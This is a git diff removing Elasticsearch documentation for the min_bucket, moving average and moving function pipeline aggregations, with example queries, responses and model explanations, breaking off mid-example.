- -A sibling pipeline aggregation which identifies the bucket(s) with the minimum value of a specified metric in a sibling aggregation -and outputs both the value and the key(s) of the bucket(s). The specified metric must be numeric and the sibling aggregation must -be a multi-bucket aggregation. 
- -==== Syntax - -A `min_bucket` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "min_bucket": { - "buckets_path": "the_sum" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[min-bucket-params]] -.`min_bucket` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |The path to the buckets we wish to find the minimum for (see <> for more - details) |Required | - |`gap_policy` |The policy to apply when gaps are found in the data (see <> for more - details)|Optional | `skip` - |`format` |format to apply to the output value of this aggregation |Optional |`null` -|=== - -The following snippet calculates the minimum of the total monthly `sales`: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - } - } - }, - "min_monthly_sales": { - "min_bucket": { - "buckets_path": "sales_per_month>sales" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `buckets_path` instructs this min_bucket aggregation that we want the minimum value of the `sales` aggregation in the -`sales_per_month` date histogram. - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "sales": { - "value": 550.0 - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "sales": { - "value": 60.0 - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "sales": { - "value": 375.0 - } - } - ] - }, - "min_monthly_sales": { - "keys": ["2015/02/01 00:00:00"], <1> - "value": 60.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -<1> `keys` is an array of strings since the minimum value may be present in multiple buckets diff --git a/docs/reference/aggregations/pipeline/movavg-aggregation.asciidoc b/docs/reference/aggregations/pipeline/movavg-aggregation.asciidoc deleted file mode 100644 index 60a5d301fb1..00000000000 --- a/docs/reference/aggregations/pipeline/movavg-aggregation.asciidoc +++ /dev/null @@ -1,653 +0,0 @@ -[[search-aggregations-pipeline-movavg-aggregation]] -=== Moving average aggregation -++++ -Moving average -++++ - -deprecated:[6.4.0, "The Moving Average aggregation has been deprecated in favor of the more general <>. The new Moving Function aggregation provides all the same functionality as the Moving Average aggregation, but also provides more flexibility."] - -Given an ordered series of data, the Moving Average aggregation will slide a window across the data and emit the average -value of that window. 
For example, given the data `[1, 2, 3, 4, 5, 6, 7, 8, 9, 10]`, we can calculate a simple moving -average with windows size of `5` as follows: - -- (1 + 2 + 3 + 4 + 5) / 5 = 3 -- (2 + 3 + 4 + 5 + 6) / 5 = 4 -- (3 + 4 + 5 + 6 + 7) / 5 = 5 -- etc - -Moving averages are a simple method to smooth sequential data. Moving averages are typically applied to time-based data, -such as stock prices or server metrics. The smoothing can be used to eliminate high frequency fluctuations or random noise, -which allows the lower frequency trends to be more easily visualized, such as seasonality. - -==== Syntax - -A `moving_avg` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "moving_avg": { - "buckets_path": "the_sum", - "model": "holt", - "window": 5, - "gap_policy": "insert_zeros", - "settings": { - "alpha": 0.8 - } - } -} --------------------------------------------------- -// NOTCONSOLE - -.`moving_avg` Parameters -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |Path to the metric of interest (see <> for more details |Required | -|`model` |The moving average weighting model that we wish to use |Optional |`simple` -|`gap_policy` |The policy to apply when gaps are found in the data. See <>. |Optional |`skip` -|`window` |The size of window to "slide" across the histogram. |Optional |`5` -|`minimize` |If the model should be algorithmically minimized. See <> for more - details |Optional |`false` for most models -|`settings` |Model-specific settings, contents which differ depending on the model specified. |Optional | -|=== - -`moving_avg` aggregations must be embedded inside of a `histogram` or `date_histogram` aggregation. They can be -embedded like any other metric aggregation: - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { <1> - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } <2> - }, - "the_movavg": { - "moving_avg": { "buckets_path": "the_sum" } <3> - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[warning:The moving_avg aggregation has been deprecated in favor of the moving_fn aggregation.] - -<1> A `date_histogram` named "my_date_histo" is constructed on the "timestamp" field, with one-day intervals -<2> A `sum` metric is used to calculate the sum of a field. This could be any metric (sum, min, max, etc) -<3> Finally, we specify a `moving_avg` aggregation which uses "the_sum" metric as its input. - -Moving averages are built by first specifying a `histogram` or `date_histogram` over a field. You can then optionally -add normal metrics, such as a `sum`, inside of that histogram. Finally, the `moving_avg` is embedded inside the histogram. -The `buckets_path` parameter is then used to "point" at one of the sibling metrics inside of the histogram (see -<> for a description of the syntax for `buckets_path`. 
- -An example response from the above aggregation may look like: - -[source,js] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "my_date_histo": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "the_sum": { - "value": 550.0 - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "the_sum": { - "value": 60.0 - }, - "the_movavg": { - "value": 550.0 - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "the_sum": { - "value": 375.0 - }, - "the_movavg": { - "value": 305.0 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - - -==== Models - -The `moving_avg` aggregation includes four different moving average "models". The main difference is how the values in the -window are weighted. As data-points become "older" in the window, they may be weighted differently. This will -affect the final average for that window. - -Models are specified using the `model` parameter. Some models may have optional configurations which are specified inside -the `settings` parameter. - -===== Simple - -The `simple` model calculates the sum of all values in the window, then divides by the size of the window. It is effectively -a simple arithmetic mean of the window. The simple model does not perform any time-dependent weighting, which means -the values from a `simple` moving average tend to "lag" behind the real data. - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_avg": { - "buckets_path": "the_sum", - "window": 30, - "model": "simple" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[warning:The moving_avg aggregation has been deprecated in favor of the moving_fn aggregation.] - -A `simple` model has no special settings to configure - -The window size can change the behavior of the moving average. For example, a small window (`"window": 10`) will closely -track the data and only smooth out small scale fluctuations: - -[[movavg_10window]] -.Moving average with window of size 10 -image::images/pipeline_movavg/movavg_10window.png[] - -In contrast, a `simple` moving average with larger window (`"window": 100`) will smooth out all higher-frequency fluctuations, -leaving only low-frequency, long term trends. It also tends to "lag" behind the actual data by a substantial amount: - -[[movavg_100window]] -.Moving average with window of size 100 -image::images/pipeline_movavg/movavg_100window.png[] - - -==== Linear - -The `linear` model assigns a linear weighting to points in the series, such that "older" datapoints (e.g. those at -the beginning of the window) contribute a linearly less amount to the total average. The linear weighting helps reduce -the "lag" behind the data's mean, since older points have less influence. 
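As a rough illustration of how the `simple` and `linear` weightings differ, the following sketch re-implements both formulas for a single window of invented values. It is not the aggregation's code; the request below then shows the `linear` model itself:

[source,python]
--------------------------------------------------
# Illustrative sketch of the two weighting schemes for one window of values.
# Values are ordered oldest -> newest, as they would be within the window.
window = [1.0, 2.0, 3.0, 4.0, 5.0]

# "simple": plain arithmetic mean of the window.
simple = sum(window) / len(window)

# "linear": newer points get linearly larger weights (1 for the oldest,
# len(window) for the newest), which reduces the lag behind recent data.
weights = range(1, len(window) + 1)
linear = sum(w * x for w, x in zip(weights, window)) / sum(weights)

print(simple)  # 3.0
print(linear)  # ~3.67, pulled toward the newer (larger) values
--------------------------------------------------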
- -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_avg": { - "buckets_path": "the_sum", - "window": 30, - "model": "linear" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[warning:The moving_avg aggregation has been deprecated in favor of the moving_fn aggregation.] - -A `linear` model has no special settings to configure - -Like the `simple` model, window size can change the behavior of the moving average. For example, a small window (`"window": 10`) -will closely track the data and only smooth out small scale fluctuations: - -[[linear_10window]] -.Linear moving average with window of size 10 -image::images/pipeline_movavg/linear_10window.png[] - -In contrast, a `linear` moving average with larger window (`"window": 100`) will smooth out all higher-frequency fluctuations, -leaving only low-frequency, long term trends. It also tends to "lag" behind the actual data by a substantial amount, -although typically less than the `simple` model: - -[[linear_100window]] -.Linear moving average with window of size 100 -image::images/pipeline_movavg/linear_100window.png[] - -==== EWMA (Exponentially Weighted) - -The `ewma` model (aka "single-exponential") is similar to the `linear` model, except older data-points become exponentially less important, -rather than linearly less important. The speed at which the importance decays can be controlled with an `alpha` -setting. Small values make the weight decay slowly, which provides greater smoothing and takes into account a larger -portion of the window. Larger values make the weight decay quickly, which reduces the impact of older values on the -moving average. This tends to make the moving average track the data more closely but with less smoothing. - -The default value of `alpha` is `0.3`, and the setting accepts any float from 0-1 inclusive. - -The EWMA model can be <> - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_avg": { - "buckets_path": "the_sum", - "window": 30, - "model": "ewma", - "settings": { - "alpha": 0.5 - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[warning:The moving_avg aggregation has been deprecated in favor of the moving_fn aggregation.] - -[[single_0.2alpha]] -.EWMA with window of size 10, alpha = 0.2 -image::images/pipeline_movavg/single_0.2alpha.png[] - -[[single_0.7alpha]] -.EWMA with window of size 10, alpha = 0.7 -image::images/pipeline_movavg/single_0.7alpha.png[] - -==== Holt-Linear - -The `holt` model (aka "double exponential") incorporates a second exponential term which -tracks the data's trend. Single exponential does not perform well when the data has an underlying linear trend. The -double exponential model calculates two values internally: a "level" and a "trend". - -The level calculation is similar to `ewma`, and is an exponentially weighted view of the data. The difference is -that the previously smoothed value is used instead of the raw value, which allows it to stay close to the original series. 
-The trend calculation looks at the difference between the current and last value (e.g. the slope, or trend, of the -smoothed data). The trend value is also exponentially weighted. - -Values are produced by multiplying the level and trend components. - -The default value of `alpha` is `0.3` and `beta` is `0.1`. The settings accept any float from 0-1 inclusive. - -The Holt-Linear model can be <> - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_avg": { - "buckets_path": "the_sum", - "window": 30, - "model": "holt", - "settings": { - "alpha": 0.5, - "beta": 0.5 - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[warning:The moving_avg aggregation has been deprecated in favor of the moving_fn aggregation.] - -In practice, the `alpha` value behaves very similarly in `holt` as `ewma`: small values produce more smoothing -and more lag, while larger values produce closer tracking and less lag. The value of `beta` is often difficult -to see. Small values emphasize long-term trends (such as a constant linear trend in the whole series), while larger -values emphasize short-term trends. This will become more apparently when you are predicting values. - -[[double_0.2beta]] -.Holt-Linear moving average with window of size 100, alpha = 0.5, beta = 0.2 -image::images/pipeline_movavg/double_0.2beta.png[] - -[[double_0.7beta]] -.Holt-Linear moving average with window of size 100, alpha = 0.5, beta = 0.7 -image::images/pipeline_movavg/double_0.7beta.png[] - -==== Holt-Winters - -The `holt_winters` model (aka "triple exponential") incorporates a third exponential term which -tracks the seasonal aspect of your data. This aggregation therefore smooths based on three components: "level", "trend" -and "seasonality". - -The level and trend calculation is identical to `holt` The seasonal calculation looks at the difference between -the current point, and the point one period earlier. - -Holt-Winters requires a little more handholding than the other moving averages. You need to specify the "periodicity" -of your data: e.g. if your data has cyclic trends every 7 days, you would set `period: 7`. Similarly if there was -a monthly trend, you would set it to `30`. There is currently no periodicity detection, although that is planned -for future enhancements. - -There are two varieties of Holt-Winters: additive and multiplicative. - -===== "Cold Start" - -Unfortunately, due to the nature of Holt-Winters, it requires two periods of data to "bootstrap" the algorithm. This -means that your `window` must always be *at least* twice the size of your period. An exception will be thrown if it -isn't. It also means that Holt-Winters will not emit a value for the first `2 * period` buckets; the current algorithm -does not backcast. - -[[holt_winters_cold_start]] -.Holt-Winters showing a "cold" start where no values are emitted -image::images/pipeline_movavg/triple_untruncated.png[] - -Because the "cold start" obscures what the moving average looks like, the rest of the Holt-Winters images are truncated -to not show the "cold start". Just be aware this will always be present at the beginning of your moving averages! 
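A minimal sketch of the bootstrap constraint described above, using hypothetical helper names rather than the aggregation's actual validation code:

[source,python]
--------------------------------------------------
# Illustrative check of the Holt-Winters "cold start" constraint: the window
# must cover at least two full periods, and no value is emitted for the
# first 2 * period buckets because the algorithm does not backcast.
def check_holt_winters_window(window, period):
    if window < 2 * period:
        raise ValueError(
            f"window ({window}) must be at least twice the period ({period})")
    first_emitted_bucket = 2 * period  # zero-based index of the first output
    return first_emitted_bucket

print(check_holt_winters_window(window=30, period=7))  # 14
--------------------------------------------------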
===== Additive Holt-Winters

Additive seasonality is the default; it can also be specified by setting `"type": "add"`. This variety is preferred
when the seasonal effect is additive to your data. E.g. you could simply subtract the seasonal effect to "de-seasonalize"
your data into a flat trend.

The default values of `alpha` and `gamma` are `0.3` while `beta` is `0.1`. The settings accept any float from 0-1 inclusive.
The default value of `period` is `1`.

The additive Holt-Winters model can be <>

[source,console]
--------------------------------------------------
POST /_search
{
  "size": 0,
  "aggs": {
    "my_date_histo": {
      "date_histogram": {
        "field": "date",
        "calendar_interval": "1M"
      },
      "aggs": {
        "the_sum": {
          "sum": { "field": "price" }
        },
        "the_movavg": {
          "moving_avg": {
            "buckets_path": "the_sum",
            "window": 30,
            "model": "holt_winters",
            "settings": {
              "type": "add",
              "alpha": 0.5,
              "beta": 0.5,
              "gamma": 0.5,
              "period": 7
            }
          }
        }
      }
    }
  }
}
--------------------------------------------------
// TEST[setup:sales]
// TEST[warning:The moving_avg aggregation has been deprecated in favor of the moving_fn aggregation.]

[[holt_winters_add]]
.Holt-Winters moving average with window of size 120, alpha = 0.5, beta = 0.7, gamma = 0.3, period = 30
image::images/pipeline_movavg/triple.png[]

===== Multiplicative Holt-Winters

Multiplicative is specified by setting `"type": "mult"`. This variety is preferred when the seasonal effect is
multiplied against your data, e.g. if the seasonal effect multiplies the data by a factor of five rather than simply
adding to it.

The default values of `alpha` and `gamma` are `0.3` while `beta` is `0.1`. The settings accept any float from 0-1 inclusive.
The default value of `period` is `1`.

The multiplicative Holt-Winters model can be <>

[WARNING]
======
Multiplicative Holt-Winters works by dividing each data point by the seasonal value. This is problematic if any of
your data is zero, or if there are gaps in the data (since this results in a divide-by-zero). To combat this, the
`mult` Holt-Winters pads all values by a very small amount (1*10^-10^) so that all values are non-zero. This affects
the result, but only minimally. If your data is non-zero, or you prefer to see `NaN` when zeros are encountered,
you can disable this behavior with `pad: false`.
======

[source,console]
--------------------------------------------------
POST /_search
{
  "size": 0,
  "aggs": {
    "my_date_histo": {
      "date_histogram": {
        "field": "date",
        "calendar_interval": "1M"
      },
      "aggs": {
        "the_sum": {
          "sum": { "field": "price" }
        },
        "the_movavg": {
          "moving_avg": {
            "buckets_path": "the_sum",
            "window": 30,
            "model": "holt_winters",
            "settings": {
              "type": "mult",
              "alpha": 0.5,
              "beta": 0.5,
              "gamma": 0.5,
              "period": 7,
              "pad": true
            }
          }
        }
      }
    }
  }
}
--------------------------------------------------
// TEST[setup:sales]
// TEST[warning:The moving_avg aggregation has been deprecated in favor of the moving_fn aggregation.]

==== Prediction

experimental[]

All the moving average models support a "prediction" mode, which will attempt to extrapolate into the future given the
current smoothed moving average. Depending on the model and parameters, these predictions may or may not be accurate.

Predictions are enabled by adding a `predict` parameter to any moving average aggregation, specifying the number of
predictions you would like appended to the end of the series.
These predictions will be spaced out at the same interval -as your buckets: - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_avg": { - "buckets_path": "the_sum", - "window": 30, - "model": "simple", - "predict": 10 - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[warning:The moving_avg aggregation has been deprecated in favor of the moving_fn aggregation.] - -The `simple`, `linear` and `ewma` models all produce "flat" predictions: they essentially converge on the mean -of the last value in the series, producing a flat: - -[[simple_prediction]] -.Simple moving average with window of size 10, predict = 50 -image::images/pipeline_movavg/simple_prediction.png[] - -In contrast, the `holt` model can extrapolate based on local or global constant trends. If we set a high `beta` -value, we can extrapolate based on local constant trends (in this case the predictions head down, because the data at the end -of the series was heading in a downward direction): - -[[double_prediction_local]] -.Holt-Linear moving average with window of size 100, predict = 20, alpha = 0.5, beta = 0.8 -image::images/pipeline_movavg/double_prediction_local.png[] - -In contrast, if we choose a small `beta`, the predictions are based on the global constant trend. In this series, the -global trend is slightly positive, so the prediction makes a sharp u-turn and begins a positive slope: - -[[double_prediction_global]] -.Double Exponential moving average with window of size 100, predict = 20, alpha = 0.5, beta = 0.1 -image::images/pipeline_movavg/double_prediction_global.png[] - -The `holt_winters` model has the potential to deliver the best predictions, since it also incorporates seasonal -fluctuations into the model: - -[[holt_winters_prediction_global]] -.Holt-Winters moving average with window of size 120, predict = 25, alpha = 0.8, beta = 0.2, gamma = 0.7, period = 30 -image::images/pipeline_movavg/triple_prediction.png[] - -[[movavg-minimizer]] -==== Minimization - -Some of the models (EWMA, Holt-Linear, Holt-Winters) require one or more parameters to be configured. Parameter choice -can be tricky and sometimes non-intuitive. Furthermore, small deviations in these parameters can sometimes have a drastic -effect on the output moving average. - -For that reason, the three "tunable" models can be algorithmically *minimized*. Minimization is a process where parameters -are tweaked until the predictions generated by the model closely match the output data. Minimization is not fullproof -and can be susceptible to overfitting, but it often gives better results than hand-tuning. - -Minimization is disabled by default for `ewma` and `holt_linear`, while it is enabled by default for `holt_winters`. -Minimization is most useful with Holt-Winters, since it helps improve the accuracy of the predictions. EWMA and -Holt-Linear are not great predictors, and mostly used for smoothing data, so minimization is less useful on those -models. 
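To give a feel for what "tweaking parameters until the predictions match the data" means, the following toy sketch scores candidate `alpha` values for an exponentially weighted average by one-step-ahead error and keeps the best one. The helper names and data are invented, and the real minimizer uses simulated annealing rather than a grid search (see the warning below):

[source,python]
--------------------------------------------------
# Toy illustration of parameter minimization: try candidate alpha values for
# an exponentially weighted moving average and keep the one whose one-step
# predictions best match the observed series (smallest squared error).
def ewma_forecasts(series, alpha):
    """Return one-step-ahead EWMA forecasts for each point after the first."""
    level = series[0]
    forecasts = []
    for x in series[1:]:
        forecasts.append(level)                   # forecast for this point
        level = alpha * x + (1 - alpha) * level   # then update with the actual value
    return forecasts

def fit_alpha(series, candidates=(0.1, 0.3, 0.5, 0.7, 0.9)):
    def error(alpha):
        return sum((f - x) ** 2
                   for f, x in zip(ewma_forecasts(series, alpha), series[1:]))
    return min(candidates, key=error)

data = [10.0, 12.0, 11.0, 13.0, 15.0, 14.0, 16.0]  # invented sample series
print(fit_alpha(data))  # picks the alpha with the lowest one-step error
--------------------------------------------------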
- -Minimization is enabled/disabled via the `minimize` parameter: - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_avg": { - "buckets_path": "the_sum", - "model": "holt_winters", - "window": 30, - "minimize": true, <1> - "settings": { - "period": 7 - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[warning:The moving_avg aggregation has been deprecated in favor of the moving_fn aggregation.] - -<1> Minimization is enabled with the `minimize` parameter - -When enabled, minimization will find the optimal values for `alpha`, `beta` and `gamma`. The user should still provide -appropriate values for `window`, `period` and `type`. - -[WARNING] -====== -Minimization works by running a stochastic process called *simulated annealing*. This process will usually generate -a good solution, but is not guaranteed to find the global optimum. It also requires some amount of additional -computational power, since the model needs to be re-run multiple times as the values are tweaked. The run-time of -minimization is linear to the size of the window being processed: excessively large windows may cause latency. - -Finally, minimization fits the model to the last `n` values, where `n = window`. This generally produces -better forecasts into the future, since the parameters are tuned around the end of the series. It can, however, generate -poorer fitting moving averages at the beginning of the series. -====== diff --git a/docs/reference/aggregations/pipeline/movfn-aggregation.asciidoc b/docs/reference/aggregations/pipeline/movfn-aggregation.asciidoc deleted file mode 100644 index 43829005330..00000000000 --- a/docs/reference/aggregations/pipeline/movfn-aggregation.asciidoc +++ /dev/null @@ -1,660 +0,0 @@ -[[search-aggregations-pipeline-movfn-aggregation]] -=== Moving function aggregation -++++ -Moving function -++++ - -Given an ordered series of data, the Moving Function aggregation will slide a window across the data and allow the user to specify a custom -script that is executed on each window of data. For convenience, a number of common functions are predefined such as min/max, moving averages, -etc. - -This is conceptually very similar to the <> pipeline aggregation, except -it provides more functionality. - -==== Syntax - -A `moving_fn` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "moving_fn": { - "buckets_path": "the_sum", - "window": 10, - "script": "MovingFunctions.min(values)" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[moving-fn-params]] -.`moving_fn` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |Path to the metric of interest (see <> for more details |Required | -|`window` |The size of window to "slide" across the histogram. |Required | -|`script` |The script that should be executed on each window of data |Required | -|`gap_policy` |The policy to apply when gaps are found in the data. See <>. |Optional |`skip` -|`shift` |<> of window position. |Optional | 0 -|=== - -`moving_fn` aggregations must be embedded inside of a `histogram` or `date_histogram` aggregation. 
They can be -embedded like any other metric aggregation: - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { <1> - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } <2> - }, - "the_movfn": { - "moving_fn": { - "buckets_path": "the_sum", <3> - "window": 10, - "script": "MovingFunctions.unweightedAvg(values)" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> A `date_histogram` named "my_date_histo" is constructed on the "timestamp" field, with one-day intervals -<2> A `sum` metric is used to calculate the sum of a field. This could be any numeric metric (sum, min, max, etc) -<3> Finally, we specify a `moving_fn` aggregation which uses "the_sum" metric as its input. - -Moving averages are built by first specifying a `histogram` or `date_histogram` over a field. You can then optionally -add numeric metrics, such as a `sum`, inside of that histogram. Finally, the `moving_fn` is embedded inside the histogram. -The `buckets_path` parameter is then used to "point" at one of the sibling metrics inside of the histogram (see -<> for a description of the syntax for `buckets_path`. - -An example response from the above aggregation may look like: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "my_date_histo": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "the_sum": { - "value": 550.0 - }, - "the_movfn": { - "value": null - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "the_sum": { - "value": 60.0 - }, - "the_movfn": { - "value": 550.0 - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "the_sum": { - "value": 375.0 - }, - "the_movfn": { - "value": 305.0 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - - -==== Custom user scripting - -The Moving Function aggregation allows the user to specify any arbitrary script to define custom logic. The script is invoked each time a -new window of data is collected. These values are provided to the script in the `values` variable. The script should then perform some -kind of calculation and emit a single `double` as the result. Emitting `null` is not permitted, although `NaN` and +/- `Inf` are allowed. - -For example, this script will simply return the first value from the window, or `NaN` if no values are available: - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_movavg": { - "moving_fn": { - "buckets_path": "the_sum", - "window": 10, - "script": "return values.length > 0 ? 
values[0] : Double.NaN" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -[[shift-parameter]] -==== shift parameter - -By default (with `shift = 0`), the window that is offered for calculation is the last `n` values excluding the current bucket. -Increasing `shift` by 1 moves starting window position by `1` to the right. - -- To include current bucket to the window, use `shift = 1`. -- For center alignment (`n / 2` values before and after the current bucket), use `shift = window / 2`. -- For right alignment (`n` values after the current bucket), use `shift = window`. - -If either of window edges moves outside the borders of data series, the window shrinks to include available values only. - -==== Pre-built Functions - -For convenience, a number of functions have been prebuilt and are available inside the `moving_fn` script context: - -- `max()` -- `min()` -- `sum()` -- `stdDev()` -- `unweightedAvg()` -- `linearWeightedAvg()` -- `ewma()` -- `holt()` -- `holtWinters()` - -The functions are available from the `MovingFunctions` namespace. E.g. `MovingFunctions.max()` - -===== max Function - -This function accepts a collection of doubles and returns the maximum value in that window. `null` and `NaN` values are ignored; the maximum -is only calculated over the real values. If the window is empty, or all values are `null`/`NaN`, `NaN` is returned as the result. - -[[max-params]] -.`max(double[] values)` Parameters -[options="header"] -|=== -|Parameter Name |Description -|`values` |The window of values to find the maximum -|=== - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_moving_max": { - "moving_fn": { - "buckets_path": "the_sum", - "window": 10, - "script": "MovingFunctions.max(values)" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -===== min Function - -This function accepts a collection of doubles and returns the minimum value in that window. `null` and `NaN` values are ignored; the minimum -is only calculated over the real values. If the window is empty, or all values are `null`/`NaN`, `NaN` is returned as the result. - -[[min-params]] -.`min(double[] values)` Parameters -[options="header"] -|=== -|Parameter Name |Description -|`values` |The window of values to find the minimum -|=== - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_moving_min": { - "moving_fn": { - "buckets_path": "the_sum", - "window": 10, - "script": "MovingFunctions.min(values)" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -===== sum Function - -This function accepts a collection of doubles and returns the sum of the values in that window. `null` and `NaN` values are ignored; -the sum is only calculated over the real values. If the window is empty, or all values are `null`/`NaN`, `0.0` is returned as the result. 
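The `null`/`NaN` handling shared by `max`, `min` and `sum` can be sketched as follows. This is illustrative Python rather than the actual `MovingFunctions` implementation, and the sample windows are invented:

[source,python]
--------------------------------------------------
import math

# Illustrative sketch of the documented null/NaN handling: ignore null and
# NaN entries, and fall back to NaN (max/min) or 0.0 (sum) when nothing
# real is left in the window.
def real_values(window):
    return [v for v in window if v is not None and not math.isnan(v)]

def window_max(window):
    vals = real_values(window)
    return max(vals) if vals else float("nan")

def window_min(window):
    vals = real_values(window)
    return min(vals) if vals else float("nan")

def window_sum(window):
    return sum(real_values(window), 0.0)  # empty window -> 0.0

print(window_max([1.0, None, float("nan"), 3.0]))  # 3.0
print(window_sum([None, float("nan")]))            # 0.0
--------------------------------------------------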
- -[[sum-params]] -.`sum(double[] values)` Parameters -[options="header"] -|=== -|Parameter Name |Description -|`values` |The window of values to find the sum of -|=== - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_moving_sum": { - "moving_fn": { - "buckets_path": "the_sum", - "window": 10, - "script": "MovingFunctions.sum(values)" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -===== stdDev Function - -This function accepts a collection of doubles and average, then returns the standard deviation of the values in that window. -`null` and `NaN` values are ignored; the sum is only calculated over the real values. If the window is empty, or all values are -`null`/`NaN`, `0.0` is returned as the result. - -[[stddev-params]] -.`stdDev(double[] values)` Parameters -[options="header"] -|=== -|Parameter Name |Description -|`values` |The window of values to find the standard deviation of -|`avg` |The average of the window -|=== - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M" - }, - "aggs": { - "the_sum": { - "sum": { "field": "price" } - }, - "the_moving_sum": { - 